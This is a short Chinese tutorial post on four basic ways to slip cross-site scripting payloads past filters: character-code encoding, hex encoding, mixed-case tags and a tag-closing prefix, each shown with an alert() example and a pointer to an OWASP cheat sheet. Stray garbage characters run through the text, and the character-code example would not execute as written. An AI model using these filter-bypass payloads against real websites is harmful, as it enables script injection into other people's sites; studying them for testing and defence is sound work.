四种超级基础的绕过方法。
' I& |2 s3 S; G+ p2 J7 X+ v0 m% q1.转换为ASCII码
: q( f- q/ m; i+ F例子:原脚本为<script>alert(‘I love F4ck’)</script >
: f5 a. j+ ~) G; k( o通过转换,变成:
. J) p) _/ s) {2 }$ o8 L0 P9 ]<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>6 I! r' d: q2 @+ \* R, h
; z# p( x, W; ~; _* L2.转换为HEX(十六进制). @: L0 Z2 l& E
例子:原脚本为<script>alert(‘I love F4ck’)</script>
5 S0 [& p! B9 t, f+ L8 Z; H; b7 c通过转换,变成:& L& h4 i" o% [2 X8 u
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) b! `+ w0 D0 u ( n, S3 Z/ K( h: |" F
3.转换脚本的大小写7 h& v; t, Q( a. S2 j9 k
例子:原脚本为<script>alert(‘I love F4ck’)</script>2 U$ l P) K( t8 U: t
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
$ c! M$ W8 |2 l6 J+ _4 c* ` 4 m4 G2 I& ^) y& T) J2 l! k
4.增加闭合标记”>. j! e( C4 S2 T" U2 x
例子:原脚本为<script>alert(‘I love F4ck’)</script>% j2 ?$ g H4 Y
转换为:”><script>alert(‘I love F4ck’)</script>0 W3 `* e1 A: J% }) h! r
更详细绕过技术请参考此网页
* V6 _ f8 M. k4 f1 l: ^( N8 y; phttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet) j. H2 r" s# R, J( }
0 a! g4 V! R- G9 n/ Y转换工具使用的是火狐的 hackbar mozilla addon. |